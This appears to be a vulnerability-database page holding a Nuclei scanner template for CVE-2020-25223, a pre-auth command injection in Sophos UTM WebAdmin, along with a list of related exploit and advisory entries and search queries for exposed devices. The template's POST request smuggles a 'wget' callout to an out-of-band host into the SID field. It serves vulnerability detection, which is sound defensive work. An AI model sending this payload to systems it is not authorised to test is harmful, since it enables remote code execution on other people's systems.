| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Sophos UTM WebAdmin SID Command Injection Exploit | 31 Oct 202100:00 | – | zdt | |
| Exploit for OS Command Injection in Sophos Unified_Threat_Management | 9 Sep 202115:58 | – | githubexploit | |
| Exploit for OS Command Injection in Sophos Unified_Threat_Management | 29 Aug 202111:08 | – | githubexploit | |
| CVE-2020-25223 | 25 Sep 202000:00 | – | attackerkb | |
| CVE-2020-25223 | 25 Sep 202000:00 | – | attackerkb | |
| The hardware-software component of WebAdmin is vulnerable to cyber threats from Sophos SG UTM (Unified Thread Management), allowing attackers to execute arbitrary commands. | 6 Mar 202300:00 | – | bdu_fstec | |
| CVE-2020-25223 | 23 Aug 202116:30 | – | circl | |
| Sophos SG UTM Remote Code Execution Vulnerability | 25 Mar 202200:00 | – | cisa_kev | |
| CVE-2020-25223 | 25 Sep 202000:00 | – | cve | |
| CVE-2020-25223 | 25 Sep 202000:00 | – | cvelist |
id: CVE-2020-25223
info:
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.
remediation: |
Apply the latest security patches provided by Sophos to mitigate the vulnerability.
reference:
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
- https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
- https://nvd.nist.gov/vuln/detail/CVE-2020-25223
- https://community.sophos.com/b/security-blog
- https://cwe.mitre.org/data/definitions/78.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-25223
cwe-id: CWE-78
epss-score: 0.96693
epss-percentile: 0.99877
cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sophos
product: unified_threat_management
shodan-query: http.title:"securepoint utm"
fofa-query: title="securepoint utm"
google-query: intitle:"securepoint utm"
tags: cve,cve2020,sophos,rce,oast,unauth,kev,vkev,vuln
http:
- raw:
- |
POST /var HTTP/1.1
Host: {{Hostname}}
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Origin: {{BaseURL}}
Connection: close
Referer: {{BaseURL}}
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4b0a00483046022100d34de6f338ce2532f54f2ce12b9921575d6a0787546463926356890139f8d5b5022100ae5a89c5d0d6a226521a503008440d2947d7398e61bf858dd4b9ba99ad3fbc11:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation